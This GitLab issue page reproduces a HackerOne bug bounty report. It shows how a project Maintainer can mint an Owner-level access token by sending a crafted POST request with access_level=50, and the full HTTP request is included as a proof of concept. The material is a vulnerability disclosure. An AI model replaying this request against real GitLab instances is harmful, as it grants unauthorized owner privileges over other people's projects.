Skip to content

Maintainer user can become owner of project

HackerOne report #1805549 by shubham_sohi on 2022-12-14, assigned to @fvpotvin:

Report | Attachments | How To Reproduce

Report

Summary

I have found a way that can be used by low privileged user to become owner of project.

NOTE:-

You need a premium GitLab account to verify the issue.

Steps to reproduce

1.Login into admin account.
2.Go to https://gitlab.com/projects/new and click on create blank project and create a project with name P.
3.Now in project P go to Project Information>Members and invite user A with Maintainer role.
Screenshot_(426).png
4.Now login into user A account.
5.In project P Go to Settings>Access Tokens, here user A can create access token.
6.But user A can only create access token for role Maintainer, Guest, Reporter and developer but does not have permission to create access token for owner role.
7.Now run below request in user A account with group_name and project_P_name.

POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2  
Host: gitlab.com  
Content-Length: 444  
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: { REDACTED }  
X-Csrf-Token: { REDACTED }

resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry

8.In response you will get new access token.
9.Now you can use this token to perform all action in project as admin.

Impact

Maintainer role user get owner privilege.

What is the expected correct behavior?

Maintainer role user should only able to create access token for Maintainer, Guest, Reporter and developer .

Output of checks

This bug happens on GitLab.com

Impact

Maintainer role user get owner privilege.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: